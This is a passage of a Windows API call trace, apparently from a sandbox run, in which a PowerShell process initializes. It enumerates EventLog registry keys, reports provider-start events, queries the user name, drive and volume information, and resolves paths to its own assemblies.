lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x0) returned 0x2 [0050.407] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x394) returned 0x0 [0050.407] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x398) returned 0x0 [0050.407] RegCloseKey (hKey=0x398) returned 0x0 [0050.408] RegCloseKey (hKey=0x378) returned 0x0 [0050.408] RegCloseKey (hKey=0x394) returned 0x0 [0050.410] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3d8 | out: phkResult=0x26d3d8*=0x394) returned 0x0 [0050.410] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d34c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d348, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d34c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d348*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.410] CoTaskMemFree (pv=0x0) [0050.410] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.410] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x43d430, lpcchName=0x26d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.410] CoTaskMemFree (pv=0x43d430) [0050.410] CoTaskMemFree (pv=0x0) [0050.410] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.410] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x43d430, lpcchName=0x26d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.410] CoTaskMemFree (pv=0x43d430) [0050.410] CoTaskMemFree (pv=0x0) [0050.410] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.410] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x43d430, lpcchName=0x26d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.410] CoTaskMemFree (pv=0x43d430) [0050.410] CoTaskMemFree (pv=0x0) [0050.410] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.410] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x43d430, lpcchName=0x26d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.410] CoTaskMemFree (pv=0x43d430) [0050.410] CoTaskMemFree (pv=0x0) [0050.410] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.410] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x43d430, lpcchName=0x26d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.410] CoTaskMemFree (pv=0x43d430) [0050.410] CoTaskMemFree (pv=0x0) [0050.410] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.410] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x43d430, lpcchName=0x26d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.411] CoTaskMemFree (pv=0x43d430) [0050.411] CoTaskMemFree (pv=0x0) [0050.411] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.411] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x43d430, lpcchName=0x26d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.411] CoTaskMemFree (pv=0x43d430) [0050.411] CoTaskMemFree (pv=0x0) [0050.411] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.411] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x43d430, lpcchName=0x26d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.411] CoTaskMemFree (pv=0x43d430) [0050.411] CoTaskMemFree (pv=0x0) [0050.411] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.411] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x43d430, lpcchName=0x26d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.411] CoTaskMemFree (pv=0x43d430) [0050.411] CoTaskMemFree (pv=0x0) [0050.411] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x378) returned 0x0 [0050.411] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x0) returned 0x2 [0050.411] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x398) returned 0x0 [0050.411] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x0) returned 0x2 [0050.412] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x39c) returned 0x0 [0050.412] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x0) returned 0x2 [0050.412] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x3a0) returned 0x0 [0050.412] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x0) returned 0x2 [0050.412] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x3a4) returned 0x0 [0050.412] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x0) returned 0x2 [0050.412] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x3a8) returned 0x0 [0050.412] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x0) returned 0x2 [0050.412] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x0) returned 0x5 [0050.424] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x3ac) returned 0x0 [0050.425] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x0) returned 0x2 [0050.425] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x3b0) returned 0x0 [0050.425] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d438 | out: phkResult=0x26d438*=0x3b4) returned 0x0 [0050.425] RegCloseKey (hKey=0x3b4) returned 0x0 [0050.425] RegCloseKey (hKey=0x394) returned 0x0 [0050.425] RegCloseKey (hKey=0x3b0) returned 0x0 [0050.433] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b950008 [0050.434] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c8be50*="WSMan", lpRawData=0x3c8bbc0) returned 1 [0050.439] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.439] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b888830, nSize=0x26d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x26d6c8) returned 0x1 [0050.440] GetUserNameW (in: lpBuffer=0x43d430, pcbBuffer=0x26d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x26d708) returned 1 [0050.440] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c91338*="Alias", lpRawData=0x3c910c8) returned 1 [0050.440] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.441] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b888830, nSize=0x26d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x26d6c8) returned 0x1 [0050.441] GetUserNameW (in: lpBuffer=0x43d430, pcbBuffer=0x26d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x26d708) returned 1 [0050.442] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c968e0*="Environment", lpRawData=0x3c96670) returned 1 [0050.442] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.442] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.442] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0050.442] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x26d270, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0050.443] SetErrorMode (uMode=0x1) returned 0x1 [0050.443] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x26d480 | out: lpFileInformation=0x26d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.443] SetErrorMode (uMode=0x1) returned 0x1 [0050.444] GetLogicalDrives () returned 0x4 [0050.447] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.448] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.448] SetErrorMode (uMode=0x1) returned 0x1 [0050.448] CoTaskMemAlloc (cb=0x68) returned 0x1b87b1b0 [0050.448] CoTaskMemAlloc (cb=0x68) returned 0x1b87b300 [0050.448] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b87b1b0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x26d450, lpMaximumComponentLength=0x26d44c, lpFileSystemFlags=0x26d448, lpFileSystemNameBuffer=0x1b87b300, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26d450*=0x705ba84c, lpMaximumComponentLength=0x26d44c*=0xff, lpFileSystemFlags=0x26d448*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0050.449] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.449] SetErrorMode (uMode=0x1) returned 0x1 [0050.449] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d3f0 | out: lpFileInformation=0x26d3f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.449] SetErrorMode (uMode=0x1) returned 0x1 [0050.449] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.449] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.450] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.450] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.450] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.450] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.450] SetErrorMode (uMode=0x1) returned 0x1 [0050.450] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.450] SetErrorMode (uMode=0x1) returned 0x1 [0050.450] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.451] SetErrorMode (uMode=0x1) returned 0x1 [0050.451] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d220 | out: lpFileInformation=0x26d220*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.451] SetErrorMode (uMode=0x1) returned 0x1 [0050.451] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.451] SetErrorMode (uMode=0x1) returned 0x1 [0050.451] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d2c0 | out: lpFileInformation=0x26d2c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0050.451] SetErrorMode (uMode=0x1) returned 0x1 [0050.451] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b888830, nSize=0x26d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x26d6c8) returned 0x1 [0050.452] GetUserNameW (in: lpBuffer=0x43d430, pcbBuffer=0x26d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x26d708) returned 1 [0050.452] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c9d938*="FileSystem", lpRawData=0x3c9d6c8) returned 1 [0050.453] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.453] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b888830, nSize=0x26d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x26d6c8) returned 0x1 [0050.453] GetUserNameW (in: lpBuffer=0x43d430, pcbBuffer=0x26d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x26d708) returned 1 [0050.454] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3ca3128*="Function", lpRawData=0x3ca2eb8) returned 1 [0050.454] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.544] CoTaskMemAlloc (cb=0x804) returned 0x1b888830 [0050.544] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b888830, nSize=0x26d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x26d6c8) returned 0x1 [0050.545] CoTaskMemFree (pv=0x1b888830) [0050.545] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.545] GetUserNameW (in: lpBuffer=0x43d430, pcbBuffer=0x26d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x26d708) returned 1 [0050.545] CoTaskMemFree (pv=0x43d430) [0050.545] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x328d010*="Registry", lpRawData=0x328cda0) returned 1 [0050.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.548] CoTaskMemAlloc (cb=0x804) returned 0x1b888830 [0050.548] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b888830, nSize=0x26d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x26d6c8) returned 0x1 [0050.549] CoTaskMemFree (pv=0x1b888830) [0050.549] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.549] GetUserNameW (in: lpBuffer=0x43d430, pcbBuffer=0x26d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x26d708) returned 1 [0050.549] CoTaskMemFree (pv=0x43d430) [0050.549] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32923d8*="Variable", lpRawData=0x3292168) returned 1 [0050.551] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.551] CoTaskMemFree (pv=0x1b852880) [0050.556] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.556] CoTaskMemFree (pv=0x1b852880) [0050.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.618] CoTaskMemAlloc (cb=0x804) returned 0x1b888830 [0050.618] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b888830, nSize=0x26d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x26d6c8) returned 0x1 [0050.619] CoTaskMemFree (pv=0x1b888830) [0050.619] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.619] GetUserNameW (in: lpBuffer=0x43d430, pcbBuffer=0x26d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x26d708) returned 1 [0050.619] CoTaskMemFree (pv=0x43d430) [0050.620] ReportEventW (hEventLog=0x1b950008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32a63c8*="Certificate", lpRawData=0x32a6158) returned 1 [0050.626] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.626] CoTaskMemFree (pv=0x1b852880) [0050.629] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26d350, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0050.629] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.630] CoTaskMemAlloc (cb=0x20e) returned 0x43b140 [0050.630] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x43b140 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0050.630] CoTaskMemFree (pv=0x43b140) [0050.631] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.632] CoTaskMemFree (pv=0x1b852880) [0050.632] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.632] CoTaskMemFree (pv=0x1b852880) [0050.642] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.643] CoTaskMemAlloc (cb=0x104) returned 0x1b852880 [0050.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852880, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.643] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, 